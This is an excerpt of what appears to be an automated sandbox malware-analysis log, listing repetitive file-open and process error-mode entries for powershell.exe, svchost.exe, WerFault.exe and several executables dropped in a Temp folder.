                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
